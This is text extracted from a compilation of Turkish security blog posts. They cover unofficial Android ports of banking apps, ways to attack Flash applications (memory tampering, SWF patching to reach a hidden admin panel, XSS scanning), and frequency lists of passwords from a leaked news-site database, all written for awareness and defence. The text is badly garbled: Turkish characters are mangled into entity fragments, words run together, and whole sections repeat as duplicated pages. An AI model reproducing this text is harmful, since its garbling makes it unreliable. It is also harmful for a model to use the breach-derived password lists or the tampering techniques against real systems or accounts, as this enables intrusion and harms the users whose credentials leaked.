Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 40: Hack 4 Career - 2011

40

bull Hafızaya muumldahale etme Diğer tuumlm uygulamalarda olduğu gibi Flash uygulamaları tarafından kullanılan verilerin bir kısmıdahafızada saklanmaktadır Hafızaya muumldahale ederek uygulamanın akışını değiştirmek sahip olmadığınız bir yetkiye sahipolabilmek muumlmkuumln olabilir Oumlzellikle oyunlarda hafızaya muumldahale ederek guumlcuumlnuumlzuuml yuumlkseltmek veya sanal paranızı arttırmakhaksız kazanca yol accedilabilir Aşağıdaki ekran goumlruumlntuumlsuumlnde bu amaccedilla kullanılan Cheat Engine aracı ile bir Poker oyununda sahipolunan paranın nasıl yuumlkseltilebildiğini goumlrebilirsiniz Bunun iccedilin yapmanız gereken o an sahip olduğunuz paranın karşılığınıhafızada bulmak ve istediğiniz değer ile değiştirmektir

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 41: Hack 4 Career - 2011

41

42

bull Tersine ccedilevirme(disassembling) Flash uygulamasına ait SWF dosyasını analiz etmek iccedilin kaynak koduna ccedileviremediğimizdurumlarda baytkodu okunabilir hale ccedilevirebilir ve analizimizi gerccedilekleştirebiliriz Analizle yetinmeyerek baytkoda muumldahaleedebilir ve SWF dosyasını yamayabiliriz Kaynak koduna ccedilevirdiğimiz ancak tekrar derleyemediğimiz durumlarda da bu yolabaşvurabiliriz Bu iki durumda da hem tersine ccedilevirme hem de yamama iccedilin RABCDasm aracından faydalanabilirsiniz Oumlrnekolarak bir oyun duumlşuumlnuumln kaynak koduna ccedilevirmek muumlmkuumln ve analiz neticesinde youmlnetim paneli SWF dosyasının iccedilinde yeralıyor ancak uygulamayı derleyenler tarafından bu youmlnetim paneline ulaşmak muumlmkuumln değil ccediluumlnkuuml bu actionscriptte yer alan vebu panel ile ilgili olan fonksiyon oyunun yuumlklenmesi esnasında goumlruumlnuumlr değil Ancak bu dosyayı tersine ccedilevirerek (disassembling)muumldahale edebilirseniz (patching) bu panelin yuumlklenme esnasında goumlruumlnuumlr hale gelmesini sağlayabilir ve youmlnetici panelineerişebilirsiniz İşte tam olarak bu durumu konu alan bir zafiyeti geccediltiğimiz aylarda kaşfederek oyunu geliştiren firma ile paylaştımve duumlzeltilmesini sağladım (Firma ccedilalışanlarının samimi ve profesyoumlnelce yaklaşımından dolayı kendilerini tebrik etmeden

43

geccedilmeyeceğim Farkındalığın arttırılması adına firma adını gizleyerek videoyu yayınlamamı sağladıkları iccedilinde kendilerine ayrıcateşekkuumlr etmek isterim

bull Zafiyet tarama araccedilları Actionscript programlama dilide guumlvenli bir şekilde kullanılmadığı taktirde XSS XSRF gibi zafiyetlereyol accedilabilmektedir Oumlzellikle URL kabul eden işleyen fonksiyonlarda ve HTML kullanılan parametrelerde bu zafiyetlere sıkccedilarastlayabiliriz Oumlrnek olarak Flash ile hazırlanmış olan reklamlarda kullanılan clickTAG değişkeni guumlvenli kullanılmadığı taktirdeXSS zafiyetine yol accedilabilmektedir Bu ve benzer sorunları tespit etmek iccedilin Actionscript kodunu detaylı olarak analiz etmek gerekirancak bu zaman alıcı bir iş ve ccediloğu kimse iccedilin uzmanlık gerektirebildiği iccedilin bunu gerccedilekleştiren programlardan faydalanabilirizHP SWFScan bu amaccedilla geliştirilmiş hedef SWF dosyasını tersine ccedilevirerek analiz eden ve 60dan fazla guumlvenlik zafiyetinitespit edebilen ve raporlayabilen faydalı bir araccediltır Aşağıdaki ekran goumlruumlntuumlsuumlne bakacak olursanız rastgele olarak seccedililmiş oumlrnekbir sitedeki SWF dosyasında yer alan XSS (cross-site scripting) guumlvenlik zafiyetini başarıyla tespit edebildiğini goumlrebilirsiniz(SWFScan Actionscript 2 ve 3 suumlruumlmlerini desteklemektedir 2 suumlruumlmuuml iccedilin ayrıca SWFIntruder aracınıda kullanabilirsiniz) Butuumlr araccedillar kimi zaman guumlvenlik zafiyetlerini tespit edemeyebilirler bu nedenle her ihtimale karşı actionscripti analiz etmekte yararolduğunu soumlyleyebilirim

44

Art niyetli kişilerin Flash uygulamalarınızı istismar etmesini zorlaştırmak iccedilin mutlaka action scriptinizi gizlemeli (obfuscation) Adobetarafından guumlvenli uygulama geliştirme oumlnerilerini dikkate almalı hafızaya muumldahale iccedilin saklanan değerleri kullanım sonrasında hemendeğiştirmeli ve trafiğe muumldahaleyi zorlaştırma adına sunucu ile uygulama arasındaki değerleri hashlemenizi tavsiye ederim

Bir sonraki yazıda goumlruumlşmek dileğiyle

Sunum dosyası Powerpoint suumlruumlmuuml

Ne Tuumlr Şifreler Kullanıyoruz Source httpswwwmertsaricacomne-tur-sifreler-kullaniyoruzBy MS on January 13th 2011

45

Geccediltiğimiz guumlnlerde yakın bir arkadaşımdan 34762 adet uumlyesi olan meşhur bir haber sitesine ait veritabanın yeraltı duumlnyasında eldenele gezdiğini oumlğrendim

Hack edilen veritabanları ahlaksız korsanlar iccedilin oldukccedila değerlidir ccediluumlnkuuml buradan elde ettikleri kişisel bilgiler sayesinde (e-posta isimsoyad şifre) bu kullanıcıların başka sistemler uumlzerinde (sosyal ağlar e-posta sistemleri vb) aynı şifreleri kullanıp kullanmadıklarınıkontrol ederek bu kullanıcılara ait daha fazla bilgiye ulaşmaya ccedilalışırlar Bunun altında yatan amaccedil kişisel bilgilerin satılması ile eldeedilecek kazanccediltır İşte bu yuumlzden her sistemde farklı şifre kullanılması oldukccedila oumlnemlidir

Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

